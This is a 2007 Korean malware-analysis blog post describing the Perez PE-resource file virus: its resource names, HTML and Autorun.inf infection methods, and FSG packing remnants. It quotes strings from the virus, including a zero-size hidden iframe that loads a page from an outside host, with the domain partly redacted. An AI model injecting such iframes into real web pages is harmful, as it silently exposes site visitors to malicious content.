태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'Perez'에 해당되는 글 1건

  1. 2007.12.05 PE 리소스 바이러스
바이러스분석2007.12.05 13:07


요 몇일 새로운 파일 바이러스가 출현했다.

감염되면 Resource 에 바이러스 코드를 추가하는 형태이며, 추가되는 RC Data 의 이름은 PERES 이다.
그래서 Kaspersky Lab 에서는 Virus.Win32.Perez 라고 명명한 상태이다.

PE + RESOURCE = PE + RES = PERES (PE리소스)

원형으로 보이는 샘플은 KAV에서 Perez 라고 진단되지 않고, 리소스 이름도 DLLRES 이다.

기존에 없던 바이러스 기법이라 할 수 있겠다.

또한 HTML 감염기법과 Autorun.inf 를 이용한 자동실행 기법도 사용된다.
바이러스 코드에는 아래와 같은 문자가 포함되어 있다.

<!HTMLFECT by [ANGELWANG] !-->

.cgi
.php
.jsp
.asp
.html
.htm

<iframe src="http://pk.[삭제].com/index.htm" width="0" height="0"></iframe>

변종 몇개가 더 존재하는데 11월 초부터 중국에서 보고되었다.

섹션은 .RIF1, .RIF2, .RIF 인데 이것은 FSG 2.0으로 압축했다가 다시 Unpack 한 과정에 생긴 섹션명이다.

사용자 삽입 이미지

제작자는 FSG 2.0으로 압축을 했다가 제대로 작동이 안되어서 RIF 가 제작한 Unpacker for FSG v2.0을 이용해서 언팩하여 사용한 것으로 보인다.

사용자 삽입 이미지

Posted by viruslab
TAG